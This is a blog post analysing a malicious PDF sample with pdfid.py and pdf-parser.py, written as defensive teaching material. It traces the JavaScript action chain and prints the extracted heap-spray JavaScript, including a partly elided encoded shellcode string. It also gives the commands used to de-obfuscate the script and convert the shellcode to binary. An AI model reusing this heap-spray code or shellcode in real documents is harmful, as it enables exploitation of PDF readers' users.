Malware PDF. Analysis of a very simple sample.

Initial Analysis

“You can’t trust anybody these days”, people like to say. Well, this is especially true of PDF files :)

While reading this awesome article on the Corelan blog, where they discuss the analysis of the infamous Zeus botnet, I realised that being able to analyze the PDF format in order to isolate the malicious code is an important skill for a security professional nowadays.

Actually, I had had this on my mind for a long time, but I always found a reason to postpone it. After reading the Corelan guys’ article, though, I decided “I want to play too!” :)

Of course, the first thing I needed was a malicious PDF sample. For that reason, I contacted Mila Parkour (she runs the Contagio blog) and she provided me with some juicy ones. Thanks Mila, you’re awesome!

The second thing I needed was some specialized tooling; I didn’t want to hexdump the whole thing :)

The obvious choice was the PDF tools from Didier Stevens. What else?

I’ll use the following PDF, “European Security Treaty-1.pdf”, which actually has nothing to do with any such treaty and apparently is of Russian origin. Surprise!

Let’s start by checking the objects inside the PDF file with pdfid.py.

PDF files are composed of objects that form a tree structure, which means that objects can (and will) reference other objects. It’s important to keep this in mind.

pdfid.py will show a preliminary view of these objects inside the PDF.

root@bt:~/pdf_malware/case_study# pdfid.py "European Security Treaty-1.pdf.evil"
PDFiD 0.0.11 European Security Treaty-1.pdf.evil
PDF Header: %PDF-1.4
obj                   48
endobj                48
stream                12
endstream             12
xref                   2
trailer                2
startxref              2
/Page                  1
/Encrypt               0
/ObjStm                0
/JS                    1
/JavaScript            2

/AA                    0
/OpenAction            1
/AcroForm              0
/JBIG2Decode           0
/RichMedia             0
/Launch                0
/Colors > 2^24         0

Something fishy here… The PDF has only one page, which is OK. There are several JavaScript entries inside, which is not that OK. There is also an /OpenAction entry, which (presumably) will execute this malicious JavaScript… too many coincidences.
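To make the idea behind that preliminary view more concrete, here is a minimal Python sketch that counts a few of the same keywords in raw PDF bytes. It is not how pdfid.py is implemented (the real tool does considerably more); the function name `count_keywords` and the toy `sample` bytes are assumptions made up for illustration.

```python
import re

# A few of the keywords that appear in the pdfid.py output above.
KEYWORDS = [b"obj", b"endobj", b"stream", b"endstream",
            b"/Page", b"/JS", b"/JavaScript", b"/OpenAction"]

def count_keywords(data: bytes) -> dict:
    """Count whole-token occurrences of each keyword in raw PDF bytes."""
    counts = {}
    for kw in KEYWORDS:
        # Bare words must not be preceded by a letter, so "obj" does not
        # match inside "endobj". Names start with "/" and need no such check.
        prefix = b"" if kw.startswith(b"/") else rb"(?<![A-Za-z])"
        # No letter may follow, so "/Page" does not match "/Pages".
        pattern = prefix + re.escape(kw) + rb"(?![A-Za-z])"
        counts[kw.decode()] = len(re.findall(pattern, data))
    return counts

# Hypothetical miniature document, just enough to exercise the counter.
sample = (b"%PDF-1.4\n"
          b"14 0 obj\n<</S/JavaScript/JS 15 0 R/Type/Action>>\nendobj\n"
          b"15 0 obj\n<</Length 3>>\nstream\nabc\nendstream\nendobj\n")

for name, count in count_keywords(sample).items():
    print(f"{name:<14}{count}")
```

A plain byte search like this would miss names that are encoded or hidden inside compressed streams, which is one reason to prefer the real tool for triage.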

In order to understand the PDF’s execution flow, we need to somehow reconstruct the object tree. Since this can get very complicated with complex documents and we are practice-oriented, let’s do it from the leaves up to the root, starting from the JavaScript objects (the interesting ones ;))

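Let’s start by searching for /JS and /JavaScript objects (the two go hand in hand: /JavaScript marks a JavaScript action or name tree, while /JS holds the script itself or a reference to it).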

root@bt:~/pdf_malware/case_study# pdf-parser.py --search javascript "European Security Treaty-1.pdf.evil"
obj 12 0
Type:
Referencing: 1 0 R, 13 0 R
[(2, '<<'), (2, '/Dests'), (1, ' '), (3, '1'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/JavaScript'), (1, ' '), (3, '13'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>'), (1, '\r')]

<<
/Dests 1 0 R
/JavaScript 13 0 R
>>

obj 14 0
Type: /Action
Referencing: 15 0 R
[(2, '<<'), (2, '/S'), (2, '/JavaScript'), (2, '/JS'), (1, ' '), (3, '15'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/Type'), (2, '/Action'), (2, '>>'), (1, '\r')]

<<
/S /JavaScript
/JS 15 0 R
/Type /Action
>>

As we can see, there are two objects (12 and 14) referencing two javascript objects (13 and 15). What about the /JS objects?

root@bt:~/pdf_malware/case_study# pdf-parser.py --search js "European Security Treaty-1.pdf.evil"
obj 14 0
Type: /Action
Referencing: 15 0 R

[(2, '<<'), (2, '/S'), (2, '/JavaScript'), (2, '/JS'), (1, ' '), (3, '15'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/Type'), (2, '/Action'), (2, '>>'), (1, '\r')]

<<
/S /JavaScript
/JS 15 0 R
/Type /Action
>>

This is the same object 14 as before, and it looks like this is the important one, since it is of the /Action type. /Action objects perform some “action” ;) when they are triggered, in this case executing the JavaScript code.

So I will focus on object 14, but just to close this topic, I would like to check what’s up with object 12.

Object 12 has no known type (at least not recognized by the tool) and is referencing javascript object 13. Let’s check this one.

root@bt:~/pdf_malware/case_study# pdf-parser.py --object 13 "European Security Treaty-1.pdf.evil"
obj 13 0
Type:
Referencing: 14 0 R
[(2, '<<'), (2, '/Names'), (2, '['), (2, '('), (3, 'heapspray'), (2, ')'), (3, '14'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, ']'), (2, '>>'), (1, '\r')]

<<
/Names [(heapspray)14 0 R]
>>

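It turns out that object 13 is just a reference to the /Action object 14 (which in turn references the JavaScript object 15). This is what the PDF format calls a name tree, a mapping between names and objects. The mapping itself is not very interesting, but note that actions listed under the /JavaScript entry of the catalog’s /Names dictionary are document-level scripts, which a viewer runs when the document is opened.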

What is interesting, however, is that the name is “heapspray”. I can tell you something about the malware authors… they are NOT subtle ;)
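As a small illustration of that name-to-object mapping, the following Python sketch pulls the pairs out of a /Names array like the one in object 13. It is a rough approximation under stated assumptions: the helper name `parse_names_array` is made up, and the regular expression ignores escaped parentheses, hex strings and nested /Kids nodes that a real name tree may contain.

```python
import re

def parse_names_array(text: str) -> dict:
    """Map each (name) in a /Names array to the (object, generation) it points to."""
    # Matches pairs such as "(heapspray)14 0 R": a literal string
    # immediately followed by an indirect reference.
    pairs = re.findall(r"\(([^)]*)\)\s*(\d+)\s+(\d+)\s+R", text)
    return {name: (int(num), int(gen)) for name, num, gen in pairs}

# The array exactly as pdf-parser.py printed it for object 13.
print(parse_names_array("/Names [(heapspray)14 0 R]"))
# prints {'heapspray': (14, 0)}
```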

Recapitulation

So, where were we? All this business with objects and references was a bit confusing…

What we know so far about the execution flow is this:

12 --> 13 (name dict) --> 14 (action) --> 15 (javascript).

Object 12 is referenced directly from the root of the tree itself, the /Catalog object (10 0), as we can confirm by checking the references to object 12:

root@bt:~/pdf_malware/case_study# pdf-parser.py --reference 12 "European Security Treaty-1.pdf.evil"
obj 10 0
Type: /Catalog
Referencing: 12 0 R, 7 0 R, 6 0 R, 11 0 R
[(2, '<<'), (2, '/PageMode'), (2, '/UseOutlines'), (2, '/Names'), (1, ' '), (3, '12'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/Metadata'), (1, ' '), (3, '7'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/Pages'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/OpenAction'), (1, ' '), (3, '11'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/Type'), (2, '/Catalog'), (2, '>>'), (1, '\r')]

<<
/PageMode /UseOutlines
/Names 12 0 R
/Metadata 7 0 R
/Pages 6 0 R
/OpenAction 11 0 R
/Type /Catalog
>>
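The walk through the references so far can also be sketched in a few lines of Python. The dictionaries below are copied from the pdf-parser.py output in this post; everything else (the `OBJECTS` table, `references`, `referrers` and `find_path`) is a hypothetical helper written for illustration, not part of Didier Stevens' tools.

```python
import re
from collections import deque

# Dictionary bodies as printed by pdf-parser.py for objects 10, 12, 13 and 14.
OBJECTS = {
    10: "/PageMode /UseOutlines /Names 12 0 R /Metadata 7 0 R "
        "/Pages 6 0 R /OpenAction 11 0 R /Type /Catalog",
    12: "/Dests 1 0 R /JavaScript 13 0 R",
    13: "/Names [(heapspray)14 0 R]",
    14: "/S /JavaScript /JS 15 0 R /Type /Action",
}

REF = re.compile(r"(\d+)\s+(\d+)\s+R\b")

def references(body: str) -> list:
    """Return the object numbers referenced by one dictionary body."""
    return [int(num) for num, _gen in REF.findall(body)]

def referrers(target: int) -> list:
    """Return the objects that reference target (the idea behind --reference)."""
    return [num for num, body in OBJECTS.items() if target in references(body)]

def find_path(start: int, goal: int):
    """Breadth-first search from start to goal over the reference graph."""
    queue = deque([[start]])
    seen = {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        # Objects we have no body for (7, 6, 11, ...) are treated as leaves.
        for nxt in references(OBJECTS.get(path[-1], "")):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None

print(referrers(12))      # prints [10]
print(find_path(10, 15))  # prints [10, 12, 13, 14, 15]
```

Searching from the catalog downwards gives the same chain that was pieced together by hand above.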

This was interesting in order to understand how the malicious javascript gets executed… but let’s check the payload itself, shall we?

The Payload

root@bt:~/pdf_malware/case_study# pdf-parser.py --object 15 "European Security Treaty-1.pdf.evil"
obj 15 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '1093'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>')]

<<
/Length 1093
/Filter /FlateDecode
>>

So this object contains a compressed data stream. In PDF jargon, a filter specifies how the stream data must be decoded in order to be usable again. In this case, the filter is /FlateDecode (zlib/deflate).
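Since /FlateDecode is plain zlib, the decoding step can be illustrated with Python's standard library. This is only a sketch: `inflate_stream` is a made-up helper, it assumes /Length is a direct integer (it can also be an indirect reference, and malicious files may lie about it), and the toy object below is built on the spot rather than taken from the sample.

```python
import re
import zlib

def inflate_stream(obj_bytes: bytes) -> bytes:
    """Slice /Length bytes after the 'stream' keyword and inflate them."""
    # Assumption: /Length holds a direct integer, as in object 15.
    length = int(re.search(rb"/Length\s+(\d+)", obj_bytes).group(1))
    # Stream data begins right after the end-of-line that follows 'stream'.
    start = re.search(rb"stream\r?\n", obj_bytes).end()
    return zlib.decompress(obj_bytes[start:start + length])

# Build a toy object so the sketch runs without the real sample.
script = b"var unes=unescape;"
packed = zlib.compress(script)
toy = (b"15 0 obj\n<</Length %d/Filter/FlateDecode>>\nstream\n" % len(packed)
       + packed + b"\nendstream\nendobj\n")

print(inflate_stream(toy))  # prints b'var unes=unescape;'
```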

Fortunately, pdf-parser.py handles this as well through the --filter option.

root@bt:~/pdf_malware/case_study# pdf-parser.py --object 15 --filter --raw "European Security Treaty-1.pdf.evil"
obj 15 0
Type:
Referencing:
Contains stream
<</Length 1093/Filter/FlateDecode>>

<<
/Length 1093
/Filter /FlateDecode
>>

var unes=unescape;
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret='';
for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
ret += util["\x62\x79\x74\x65\x54\x6f\x43\x68\x61\x72"](Number('0x'+buf.substr(x,2)));//
}
return ret;
}
var sc=unes("%u4341%u4b49%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9"+
"%uEBFA%uE805%uFFEB%uFFFF%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9"+
"%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF"+
"%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06"+
"%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF"+
"%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791"+
"%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA"+
"%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601"+
"%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993"+
"%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+
[…]
"%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+
"%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D"+
"%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+
"%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+
"%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+
"%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+
"%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+
"%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+
"%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+
"%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+
"%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C"+
"%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");

function exp() {

blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u0c0c%u0c0c");
wap = 20+blah["\x6c\x65\x6e\x67\x74\x68"];
while (bbk["\x6c\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["\x6c\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<0x80000) bk = bk+bk+fillbk;
mm = new Array();
for (i=0;i<200;i++) mm[i] = bk + blah;
}
exp();

Niiiicccceee, the JavaScript is barely obfuscated! The authors applied just some dumb-ass techniques, like writing property and method names as hex escapes. For example, “\x6c\x65\x6e\x67\x74\x68” is actually the word “length”. Let’s get rid of these annoyances.
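This kind of substitution is easy to automate. The Python sketch below assumes the escapes appear with their backslashes (\xNN), as they would in the real script; `decode_hex_escapes` and `dot_notation` are hypothetical helper names, and the second one only handles the simple obj["name"] pattern seen in this sample.

```python
import re

def decode_hex_escapes(js: str) -> str:
    r"""Replace every \xNN escape with the character it encodes."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), js)

def dot_notation(js: str) -> str:
    """Rewrite obj["name"] as obj.name when name is a plain identifier."""
    return re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r".\1", js)

# One line of the payload, with the escapes written out in full.
line = r'wap = 20+blah["\x6c\x65\x6e\x67\x74\x68"];'
print(dot_notation(decode_hex_escapes(line)))
# prints wap = 20+blah.length;
```

Decoding blindly is fine for a sample this simple; on heavier obfuscation the escapes may sit inside strings that should not be rewritten, so the result is worth a quick manual check.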

After substituting, the javascript looks more familiar :)

function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret='';
for (var x=0;x < buf.length; x+=2) {
ret += util.byteToChar(Number('0x'+buf.substr(x,2)));//
}
return ret;
}
var sc=unescape("%u4341%u4b49%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9"+
"%uEBFA%uE805%uFFEB%uFFFF%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9"+
"%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF"+
"%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06"+
[…]
"%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C"+
"%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");

function exp() {

blah = rep(128, unescape("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unescape("%u0c0c%u0c0c");
wap = 20+blah.length;
while (bbk.length<wap) bbk+=bbk;
fillbk = bbk.substring(0, wap);
bk = bbk.substring(0, bbk.length-wap);
while(bk.length+wap<0x80000) bk = bk+bk+fillbk;

mm = new Array();
for (i=0;i<200;i++) mm[i] = bk + blah;
}
exp();

This is a textbook “SkyLined” heap spray. Not a surprise, since this is the most widely used heap spray technique today…

As you can see, the variable sc contains the shellcode, and it is not modified by the sequence of “arithmetic” operations at the end of the script. These operations only build the slide of the heap spray (the long filler part that isn’t shellcode, here made of 0x0c0c values).

If we wanted to take a look at the whole payload, we would need to actually execute the script and check the variable bk. We could easily do this with SpiderMonkey, like this:

root@bt:~/pdf_malware/case_study# js -f shellcode.js -f -
js> print(bk.length);
523398

js> escape(bk);

%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C
[…]

%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C
%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C
%u0C0C%u0C0C%u0C0C
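The length printed by SpiderMonkey can be cross-checked without running the script at all, by replaying exp() with string lengths only. The Python sketch below does that; `spray_lengths` is a hypothetical helper, and the shellcode length of 230 characters is an assumption (the full sc string is elided in this post), picked because it reproduces the 523398 shown above.

```python
def spray_lengths(sc_len: int):
    """Replay exp() using string lengths only (in UTF-16 code units)."""
    blah = 128 * 5 + sc_len      # rep(128, five %u4242 units) + sc
    bbk = 2                      # unescape("%u0c0c%u0c0c") is two units long
    wap = 20 + blah
    while bbk < wap:             # bbk += bbk
        bbk += bbk
    bk = bbk - wap               # bbk.substring(0, bbk.length - wap)
    while bk + wap < 0x80000:    # bk = bk + bk + fillbk, fillbk is wap long
        bk = bk + bk + wap
    return bk, wap

# 230 is an assumed shellcode length, not a value stated in the article.
bk_len, wap = spray_lengths(sc_len=230)
print(bk_len, wap)               # prints 523398 890
print(hex(bk_len + wap))         # prints 0x80000
```

Because bbk doubles up to a power of two and every pass of the last loop doubles bk.length + wap, that sum lands exactly on 0x80000, so each of the 200 entries bk + blah comes out 20 characters short of 0x80000 under these assumptions.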

So, we have confirmed that this PDF is indeed malicious; we extracted the JavaScript from it and even got the shellcode.

Further analysis would involve some static analysis of the shellcode, which we could convert to its binary form like this:

$ perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' < shellcode.js > shellcode.raw
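For readers who prefer Python, here is a rough equivalent of that byte swap. It is a sketch, not a drop-in replacement: unlike the Perl one-liner, which rewrites the escapes in place and leaves the rest of the file alone, the hypothetical `unescape_to_bytes` below keeps only the decoded bytes, so it is best fed just the sc string.

```python
import re

def unescape_to_bytes(text: str) -> bytes:
    """Turn each %uXXXX escape into two bytes, low byte first."""
    out = bytearray()
    for word in re.findall(r"%u([0-9a-fA-F]{4})", text):
        # %u4341 is the 16-bit value 0x4341, stored in memory as 41 43.
        out += int(word, 16).to_bytes(2, "little")
    return bytes(out)

# The first four units of sc, copied from the script above.
head = "%u4341%u4b49%u11EB%u5BFC"
print(unescape_to_bytes(head).hex())
# prints 4143494beb11fc5b
```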

But this will be another story…

 


3 thoughts on “Malware PDF. Analysis of a very simple sample.”

  1. I have similar JS using the util.byteToChar function, but SpiderMonkey requires me to create an object to handle this function. I tried Google but had no luck. Any hints?
